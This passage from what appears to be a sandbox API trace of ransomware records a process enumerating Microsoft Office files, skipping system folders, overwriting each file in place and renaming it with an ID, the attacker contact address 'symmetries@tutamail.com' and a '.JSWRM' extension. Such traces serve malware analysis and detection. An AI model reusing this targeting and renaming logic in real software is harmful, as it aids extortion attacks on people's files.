office\\root\\office16\\pubwiz\\cert.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0140.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0140.837] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21994fc3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x170a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CERT.XML", cAlternateFileName="")) returned 1 [0140.837] lstrcmpiW (lpString1="CERT.XML", lpString2=".") returned 1 [0140.837] lstrcmpiW (lpString1="CERT.XML", lpString2="..") returned 1 [0140.837] lstrcmpiW (lpString1="CERT.XML", lpString2="...") returned 1 [0140.837] lstrcmpiW (lpString1="CERT.XML", lpString2="windows") returned -1 [0140.838] lstrcmpiW (lpString1="CERT.XML", lpString2="recovery") returned -1 [0140.838] lstrcmpiW (lpString1="CERT.XML", lpString2="perflogs") returned -1 [0140.838] lstrcmpiW (lpString1="CERT.XML", lpString2="documents and settings") returned -1 [0140.838] lstrcmpiW (lpString1="CERT.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.838] lstrcmpiW (lpString1="CERT.XML", lpString2="system volume information") returned -1 [0140.838] lstrcmpiW (lpString1="CERT.XML", lpString2="msocache") returned -1 [0140.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0140.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT.XML", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERT.XML", lpUsedDefaultChar=0x0) returned 8 [0140.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0140.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0140.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT.XML", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERT.XML", lpUsedDefaultChar=0x0) returned 8 [0140.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0140.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0140.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0140.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0140.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.839] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5898) returned 1 [0140.839] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1700) returned 0x27b348 [0140.839] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1700, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1700, lpOverlapped=0x0) returned 1 [0140.841] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.841] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1700, lpOverlapped=0x0) returned 1 [0140.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.842] CloseHandle (hObject=0x238) returned 1 [0140.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0140.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0140.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0140.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0140.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0140.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.842] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0140.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0140.843] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a2da43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a2da43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a53b55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11b82, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CERT98.POC", cAlternateFileName="")) returned 1 [0140.843] lstrcmpiW (lpString1="CERT98.POC", lpString2=".") returned 1 [0140.843] lstrcmpiW (lpString1="CERT98.POC", lpString2="..") returned 1 [0140.843] lstrcmpiW (lpString1="CERT98.POC", lpString2="...") returned 1 [0140.843] lstrcmpiW (lpString1="CERT98.POC", lpString2="windows") returned -1 [0140.843] lstrcmpiW (lpString1="CERT98.POC", lpString2="recovery") returned -1 [0140.843] lstrcmpiW (lpString1="CERT98.POC", lpString2="perflogs") returned -1 [0140.843] lstrcmpiW (lpString1="CERT98.POC", lpString2="documents and settings") returned -1 [0140.844] lstrcmpiW (lpString1="CERT98.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.844] lstrcmpiW (lpString1="CERT98.POC", lpString2="system volume information") returned -1 [0140.844] lstrcmpiW (lpString1="CERT98.POC", lpString2="msocache") returned -1 [0140.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0140.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERT98.POC", lpUsedDefaultChar=0x0) returned 10 [0140.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0140.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0140.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERT98.POC", lpUsedDefaultChar=0x0) returned 10 [0140.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0140.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0140.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0140.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0140.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.845] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=72578) returned 1 [0140.845] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11b80) returned 0x27b348 [0140.845] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11b80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x11b80, lpOverlapped=0x0) returned 1 [0140.851] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.851] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11b80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x11b80, lpOverlapped=0x0) returned 1 [0140.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.852] CloseHandle (hObject=0x238) returned 1 [0140.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0140.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0140.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0140.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0140.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0140.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.852] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0140.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0140.856] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21bab08a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21bab08a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x53bc, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CERT98SP.POC", cAlternateFileName="")) returned 1 [0140.856] lstrcmpiW (lpString1="CERT98SP.POC", lpString2=".") returned 1 [0140.856] lstrcmpiW (lpString1="CERT98SP.POC", lpString2="..") returned 1 [0140.856] lstrcmpiW (lpString1="CERT98SP.POC", lpString2="...") returned 1 [0140.856] lstrcmpiW (lpString1="CERT98SP.POC", lpString2="windows") returned -1 [0140.856] lstrcmpiW (lpString1="CERT98SP.POC", lpString2="recovery") returned -1 [0140.856] lstrcmpiW (lpString1="CERT98SP.POC", lpString2="perflogs") returned -1 [0140.856] lstrcmpiW (lpString1="CERT98SP.POC", lpString2="documents and settings") returned -1 [0140.857] lstrcmpiW (lpString1="CERT98SP.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.857] lstrcmpiW (lpString1="CERT98SP.POC", lpString2="system volume information") returned -1 [0140.857] lstrcmpiW (lpString1="CERT98SP.POC", lpString2="msocache") returned -1 [0140.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0140.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT98SP.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERT98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0140.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0140.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0140.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT98SP.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERT98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0140.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0140.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0140.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0140.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0140.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.858] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21436) returned 1 [0140.858] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x53b0) returned 0x27b348 [0140.858] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x53b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x53b0, lpOverlapped=0x0) returned 1 [0140.861] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.861] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x53b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x53b0, lpOverlapped=0x0) returned 1 [0140.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.862] CloseHandle (hObject=0x238) returned 1 [0140.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0140.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0140.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0140.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0140.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0140.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0140.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0140.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0140.862] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert98sp.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT98SP.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert98sp.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0140.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0140.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0140.863] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21994fc3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x170e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CHECKER.POC", cAlternateFileName="")) returned 1 [0140.863] lstrcmpiW (lpString1="CHECKER.POC", lpString2=".") returned 1 [0140.863] lstrcmpiW (lpString1="CHECKER.POC", lpString2="..") returned 1 [0140.863] lstrcmpiW (lpString1="CHECKER.POC", lpString2="...") returned 1 [0140.863] lstrcmpiW (lpString1="CHECKER.POC", lpString2="windows") returned -1 [0140.863] lstrcmpiW (lpString1="CHECKER.POC", lpString2="recovery") returned -1 [0140.863] lstrcmpiW (lpString1="CHECKER.POC", lpString2="perflogs") returned -1 [0140.863] lstrcmpiW (lpString1="CHECKER.POC", lpString2="documents and settings") returned -1 [0140.863] lstrcmpiW (lpString1="CHECKER.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.864] lstrcmpiW (lpString1="CHECKER.POC", lpString2="system volume information") returned -1 [0140.864] lstrcmpiW (lpString1="CHECKER.POC", lpString2="msocache") returned -1 [0140.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0140.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 